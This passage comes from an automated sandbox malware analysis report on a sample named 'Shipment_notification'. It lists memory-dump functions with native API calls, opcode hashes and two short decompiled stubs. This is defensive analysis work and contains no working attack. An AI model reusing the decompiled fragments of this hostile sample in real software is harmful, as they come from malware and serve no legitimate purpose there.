                                                                                • Instruction Fuzzy Hash: 9F012CB6604149AFCB14DF98E881CEB73A9EF88314B14865DFD1C97202C635E861CBB4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0041E5A3 Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • NtCreateFile.NTDLL(00000060,00000000,?,0041930F,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,0041930F,?,00000000,00000060,00000000,00000000), ref: 0041E5F0
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.377228453.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_Shipment_notification.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateFile
                                                                                • String ID:
                                                                                • API String ID: 823142352-0
                                                                                • Opcode ID: 0e100477f5381d3d7289312ef97c1911a17bc4e8064b3a3f2b56bd156d4f763d
                                                                                • Instruction ID: 28ed42536b8ae6d539176f91f8009f5d4e4c6ca2a7512c41f4953ace4a2a2ce5
                                                                                • Opcode Fuzzy Hash: 0e100477f5381d3d7289312ef97c1911a17bc4e8064b3a3f2b56bd156d4f763d
                                                                                • Instruction Fuzzy Hash: 94F0BDB2204208ABCB08CF89DC85EEB37ADAF8C754F018248BA0997241C630E8518BA4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0041E64E Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 16%
                                                                                			E0041E64E(void* __eax, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t20;
				void* _t30;
				intOrPtr* _t31;
				void* _t33;

				asm("adc ch, ah");
				_t4 = _a4 + 0xa74; // 0xa76
				_t31 = _t4;
				E0041F213( *((intOrPtr*)(_a4 + 0x14)), _t15, _t31,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x2a, _t30);
				_t20 =  *((intOrPtr*)( *_t31))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _t33); // executed
				return _t20;
			}







                                                                                0x0041e64e
                                                                                0x0041e662
                                                                                0x0041e662
                                                                                0x0041e66a
                                                                                0x0041e698
                                                                                0x0041e69c

                                                                                APIs
                                                                                • NtReadFile.NTDLL(004194D3,004149A4,FFFFFFFF,00418FBD,00000002,?,004194D3,00000002,00418FBD,FFFFFFFF,004149A4,004194D3,00000002,00000000), ref: 0041E698
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.377228453.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_Shipment_notification.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileRead
                                                                                • String ID:
                                                                                • API String ID: 2738559852-0
                                                                                • Opcode ID: 98c32700c571c49239a77221e6646b3ecb99fb0c00bd572aadebc5af7cdc358a
                                                                                • Instruction ID: e4a79c653669e880bb12197b3ccb4e5e057014e4b39e99fdaea623c3d5a13fe2
                                                                                • Opcode Fuzzy Hash: 98c32700c571c49239a77221e6646b3ecb99fb0c00bd572aadebc5af7cdc358a
                                                                                • Instruction Fuzzy Hash: 45F0F4B6204108AFCB14DF99DC84EEB77A9EF8C314F058248BE4D97241C630E811CBA0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0041E653 Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • NtReadFile.NTDLL(004194D3,004149A4,FFFFFFFF,00418FBD,00000002,?,004194D3,00000002,00418FBD,FFFFFFFF,004149A4,004194D3,00000002,00000000), ref: 0041E698
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.377228453.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_Shipment_notification.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileRead
                                                                                • String ID:
                                                                                • API String ID: 2738559852-0
                                                                                • Opcode ID: 844797972357584b4267d2b4ccdf650626f96eee6e100a2b7eb001bcc7868e0e
                                                                                • Instruction ID: 3396cf3d00253785fe46cccb375f18d1b035e4a929d0b0b67bfdf3e01cbb23bd
                                                                                • Opcode Fuzzy Hash: 844797972357584b4267d2b4ccdf650626f96eee6e100a2b7eb001bcc7868e0e
                                                                                • Instruction Fuzzy Hash: 94F0AFB6204208ABCB14DF99DC85EEB77ADAF8C754F118259BA0DA7241D630E8118BA5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0041E7FD Relevance: 1.5, APIs: 1, Instructions: 32memorynativeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • NtAllocateVirtualMemory.NTDLL(00010000,?,00000000,?,00000004,00001000,00000000), ref: 0041E7BC
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.377228453.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_Shipment_notification.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocateMemoryVirtual
                                                                                • String ID:
                                                                                • API String ID: 2167126740-0
                                                                                • Opcode ID: 73cead742a487795881431c3274d451430c9a1e0f5eacf914f6006a8be199b3b
                                                                                • Instruction ID: 126e762613f4bcff93355a323de4e2b8822976fcfef5a5571657ba109fa4f598
                                                                                • Opcode Fuzzy Hash: 73cead742a487795881431c3274d451430c9a1e0f5eacf914f6006a8be199b3b
                                                                                • Instruction Fuzzy Hash: 9BF030B62401146FCB15DF89DC40EE7376DEF88714F118259FA1997291C634E812CBB4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0041E783 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • NtAllocateVirtualMemory.NTDLL(00010000,?,00000000,?,00000004,00001000,00000000), ref: 0041E7BC
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.377228453.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_Shipment_notification.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocateMemoryVirtual
                                                                                • String ID:
                                                                                • API String ID: 2167126740-0
                                                                                • Opcode ID: 007d9bb2bc6f869d9d5f2aff9c303a90246c852ee550cafd5b2adb6fd69cc88f
                                                                                • Instruction ID: b3982775e90bd412a0d9a94dd5c17af1038dea2d1a93f09179e9e501fcf7fea0
                                                                                • Opcode Fuzzy Hash: 007d9bb2bc6f869d9d5f2aff9c303a90246c852ee550cafd5b2adb6fd69cc88f
                                                                                • Instruction Fuzzy Hash: FAF01EB6200208ABCB18DF89DC81EEB77ADAF88754F018159BE0897241C630F811CBB4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0041E6D3 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • NtClose.NTDLL(004102E8,00000000,?,004102E8,?,?,?,?,?,?,?,00000000,?,00000000), ref: 0041E6F8
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.377228453.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_Shipment_notification.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Close
                                                                                • String ID:
                                                                                • API String ID: 3535843008-0
                                                                                • Opcode ID: 675b6986af3fbe89ca5381cf45abfbeb38fb14a73c53f9364842799534e556c6
                                                                                • Instruction ID: aa7c47011013ccb3794a43389b7bee8dbfc91bdf6e1158d0c5e3fd24ced1ae8f
                                                                                • Opcode Fuzzy Hash: 675b6986af3fbe89ca5381cf45abfbeb38fb14a73c53f9364842799534e556c6
                                                                                • Instruction Fuzzy Hash: 26D0C732604204ABD620EBE8DC89FC73BACDF48620F0080A9BA0C5B242C230FA0086E0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01B299A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: db587871d7f43b06385d346f47e797011a5a7a85e80ed6ea78506907fd0feb75
                                                                                • Instruction ID: 332f72019e1ec8d39fa3ac1f8c59385cfbe9c12ad0592a85137746fab898040e
                                                                                • Opcode Fuzzy Hash: db587871d7f43b06385d346f47e797011a5a7a85e80ed6ea78506907fd0feb75
                                                                                • Instruction Fuzzy Hash: A59002A235100442D104619D4414B061005E7E1342FD1C059E1054554DC759CC727166
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01B295D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 8e3802a2d4a8d10c973b68414ca0945068b02f36a3c1ec1c0ceacd4e7b152df7
                                                                                • Instruction ID: a1dd4bc8fca631f24f632ca6a2c728ecf5242984648e26b76be695c2ff39792a
                                                                                • Opcode Fuzzy Hash: 8e3802a2d4a8d10c973b68414ca0945068b02f36a3c1ec1c0ceacd4e7b152df7
                                                                                • Instruction Fuzzy Hash: C89002A2212000034109719D4414616500AA7E0242BD1C065E1004590DC66588B17165
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01B29910 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: c6d63703d0e967a461adcb9a42c1f5bfcfe4cd382a87f340d2272ec50337c7b9
                                                                                • Instruction ID: ac70e25a12766ea4231b82d18822b0f241d6adfb0e85874d7675e6c88bfb4480
                                                                                • Opcode Fuzzy Hash: c6d63703d0e967a461adcb9a42c1f5bfcfe4cd382a87f340d2272ec50337c7b9
                                                                                • Instruction Fuzzy Hash: 6B9002B221100402D144719D44047461005A7D0342FD1C055A5054554EC7998DF576A5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01B29540 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 3deb712839b793ad1c88ee61771d1a4cfc59d9b9c2514b829fcd7a07965193e6
                                                                                • Instruction ID: d7aa44c55e345d7632a88fade3b32b83f055ff190f9ede8f1d23547e0e143520
                                                                                • Opcode Fuzzy Hash: 3deb712839b793ad1c88ee61771d1a4cfc59d9b9c2514b829fcd7a07965193e6
                                                                                • Instruction Fuzzy Hash: 6F900266221000030109A59D07045071046A7D53923D1C065F1005550CD76188716161
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01B298F0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 6d4b07f13bf6455762744810697e2062f126ed2324dbe065cad263e451eeea83
                                                                                • Instruction ID: 62fc5e7f428a450326238d89eeb633e528cbb16cbb7d6f5d9fbf9c23039bc711
                                                                                • Opcode Fuzzy Hash: 6d4b07f13bf6455762744810697e2062f126ed2324dbe065cad263e451eeea83
                                                                                • Instruction Fuzzy Hash: 8A90026261100502D105719D4404616100AA7D0282FD1C066A1014555ECB6589B2B171
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01B29860 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 3da7dbc2e301e7c9019156d5c70d36dde2de3dece582c50271bc06c2bb217e32
                                                                                • Instruction ID: c700c544039ba5c4c51b72c7debd24bb0b8c42604cea414b1ef88abb136d209f
                                                                                • Opcode Fuzzy Hash: 3da7dbc2e301e7c9019156d5c70d36dde2de3dece582c50271bc06c2bb217e32
                                                                                • Instruction Fuzzy Hash: D390027221100413D115619D45047071009A7D0282FD1C456A0414558DD7968972B161
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01B29840 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: d3830e4f343c34d86ee2659745fd0047540ed8a288a45703c218a6e557712063
                                                                                • Instruction ID: 894e85d2dc8585a93f8fa4845f0beded80d6b0d5abbe1b77896c0df89a43fb75
                                                                                • Opcode Fuzzy Hash: d3830e4f343c34d86ee2659745fd0047540ed8a288a45703c218a6e557712063
                                                                                • Instruction Fuzzy Hash: 6A900262252041525549B19D44045075006B7E02827D1C056A1404950CC6669876E661
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01B297A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 35eb0de7c74bafd819704968edb084fe991ddf414a9c2b10adb7c41b0937af14
                                                                                • Instruction ID: 56685d06b23ed13f4527dc56e34697fe56933776e0cfce4c0647810d5992f70c
                                                                                • Opcode Fuzzy Hash: 35eb0de7c74bafd819704968edb084fe991ddf414a9c2b10adb7c41b0937af14
                                                                                • Instruction Fuzzy Hash: 7290026231100003D144719D54186065005F7E1342FD1D055E0404554CDA5588766262
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01B29780 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 94c197659ea844b14cdcdee016c7f107745307eacf8ed6a6b1efdfd1b86f3089
                                                                                • Instruction ID: 831ba9f39a33e6584329c07c017b079b1aaec5ae7dd6892a3e068fe41cd6bcf5
                                                                                • Opcode Fuzzy Hash: 94c197659ea844b14cdcdee016c7f107745307eacf8ed6a6b1efdfd1b86f3089
                                                                                • Instruction Fuzzy Hash: 4490026A22300002D184719D540860A1005A7D1243FD1D459A0005558CCA5588796361
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01B29FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 573465c64eb392d2ec478cce2535364500b2e970a5d86b2212644024e1a44414
                                                                                • Instruction ID: 0b22525dcbeb1c2aa5532a7fbeb4bb0dec779be91b4cf2e7a7f4529b736e5f4f
                                                                                • Opcode Fuzzy Hash: 573465c64eb392d2ec478cce2535364500b2e970a5d86b2212644024e1a44414
                                                                                • Instruction Fuzzy Hash: D090027232114402D114619D84047061005A7D1242FD1C455A0814558DC7D588B17162
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01B29710 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 8c54293a1bb3ea2669be85aea4e26fddd6dec92b66923c2569bcd8806a4392ad
                                                                                • Instruction ID: 00d6d6681bed038d683895feae7548e190fe90f7f0a2c931ffb1cfd26a29cb02
                                                                                • Opcode Fuzzy Hash: 8c54293a1bb3ea2669be85aea4e26fddd6dec92b66923c2569bcd8806a4392ad
                                                                                • Instruction Fuzzy Hash: A390027221100402D10465DD54086461005A7E0342FD1D055A5014555EC7A588B17171
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01B296E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 59e6645bf81fa2dcafa8451fbc075d64074098d9527fe2b417ff0b9654eb43c8
                                                                                • Instruction ID: 679fcdcd716da471f03705f7cac030231ed1226b4955b21ac877085bcca3ac15
                                                                                • Opcode Fuzzy Hash: 59e6645bf81fa2dcafa8451fbc075d64074098d9527fe2b417ff0b9654eb43c8
                                                                                • Instruction Fuzzy Hash: D990027221108802D114619D840474A1005A7D0342FD5C455A4414658DC7D588B17161
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01B29A20 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 13f78f6bbd81fbcc0316d6301c5bcbf0ab13d76e7b51ca48d37ec1593d8630e1
                                                                                • Instruction ID: d533d17376d4be41c0c4ac450b0b416a4963a3418962ba1e62719fb99f7a54d4
                                                                                • Opcode Fuzzy Hash: 13f78f6bbd81fbcc0316d6301c5bcbf0ab13d76e7b51ca48d37ec1593d8630e1
                                                                                • Instruction Fuzzy Hash: 4290026261100042414471AD88449065005BBE12527D1C165A0988550DC699887566A5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01B29A00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 0d76fa413927bbdd086ec83f1f4340ca03d00235b8e3aba65841846df91feae9
                                                                                • Instruction ID: 7a66f2f551ee12510bfa26226ffc4743792fec94cd86d3726aa0f570a65567b1
                                                                                • Opcode Fuzzy Hash: 0d76fa413927bbdd086ec83f1f4340ca03d00235b8e3aba65841846df91feae9
                                                                                • Instruction Fuzzy Hash: F790027221140402D104619D481470B1005A7D0343FD1C055A1154555DC765887175B1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01B29660 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: a8907453c4751f78b24f97cd5508ddc4518c85337af4e6f58510f228a810715c
                                                                                • Instruction ID: e9a1f1933b39e2dffcf487eee3b57651768b24e68019364b467543d923148667
                                                                                • Opcode Fuzzy Hash: a8907453c4751f78b24f97cd5508ddc4518c85337af4e6f58510f228a810715c
                                                                                • Instruction Fuzzy Hash: 5290027221100802D184719D440464A1005A7D1342FD1C059A0015654DCB558A7977E1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01B29A50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 43999d714e97fc1c4dfdf5aa4a629173470b589e8fc4d1bbc67acba03c94226c
                                                                                • Instruction ID: 0baefe1b5b55fbce6ae69e1e1bd1809dbe1fa8797c8ee335b0a0d86ae43d4179
                                                                                • Opcode Fuzzy Hash: 43999d714e97fc1c4dfdf5aa4a629173470b589e8fc4d1bbc67acba03c94226c
                                                                                • Instruction Fuzzy Hash: 4C90026222180042D20465AD4C14B071005A7D0343FD1C159A0144554CCA5588716561
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0041E8F3 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 85 41e8f3-41e90c 86 41e912-41e91b ExitProcess 85->86 87 41e90d call 41f213 85->87 87->86
                                                                                C-Code - Quality: 100%
                                                                                			E0041E8F3(intOrPtr _a4, int _a8) {
				void* _t10;

				E0041F213( *((intOrPtr*)(_a4 + 0x890)), _a4, _t5 + 0xaa8,  *((intOrPtr*)(_a4 + 0x890)), 0, 0x36, _t10);
				ExitProcess(_a8);
			}




                                                                                0x0041e90d
                                                                                0x0041e91b

                                                                                APIs
                                                                                • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041E91B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.377228453.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_Shipment_notification.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExitProcess
                                                                                • String ID: G5@
                                                                                • API String ID: 621844428-1585037681
                                                                                • Opcode ID: 4d86f6eab3956e3221f691deff94274828b67c33ff55812aa02860a8a29c985a
                                                                                • Instruction ID: fb451d8b7e59288c5661e62a9459df07397a11b1f932154924971f483ef9b8f5
                                                                                • Opcode Fuzzy Hash: 4d86f6eab3956e3221f691deff94274828b67c33ff55812aa02860a8a29c985a
                                                                                • Instruction Fuzzy Hash: 9BD0C2316002047FC620EBC8CC45FE3379CEF44650F0480A5BA4C5B241C630BA00C7E0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0041E8E5 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 19COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 88 41e8e5-41e91b call 41f213 ExitProcess
                                                                                C-Code - Quality: 68%
                                                                                			E0041E8E5(intOrPtr _a4, int _a8) {
				signed int _t5;
				void* _t13;

				asm("das");
				 *0xec8b5574 =  *0xec8b5574 | _t5 | 0x1be55785;
				E0041F213( *((intOrPtr*)(_a4 + 0x890)), _a4, _t7 + 0xaa8,  *((intOrPtr*)(_a4 + 0x890)), 0, 0x36, _t13);
				ExitProcess(_a8);
			}





                                                                                0x0041e8ea
                                                                                0x0041e8f0
                                                                                0x0041e90d
                                                                                0x0041e91b

                                                                                APIs
                                                                                • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041E91B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.377228453.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_Shipment_notification.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExitProcess
                                                                                • String ID: G5@
                                                                                • API String ID: 621844428-1585037681
                                                                                • Opcode ID: 0c822b09f59aa754499ead228271f1f98c22c96f7353faa335723b8ec65232e3
                                                                                • Instruction ID: 9bffe224eaa3cac599bd7a61e0cedb3719dbaf93cb2e393d87e64cfb091599c0
                                                                                • Opcode Fuzzy Hash: 0c822b09f59aa754499ead228271f1f98c22c96f7353faa335723b8ec65232e3
                                                                                • Instruction Fuzzy Hash: 6FE0C279B00200BFC720EFA4CD85FE73FA9AF05694F0580A9BA885F242C670AA01C795
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004098F7 Relevance: 1.7, APIs: 1, Instructions: 168threadwindowCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
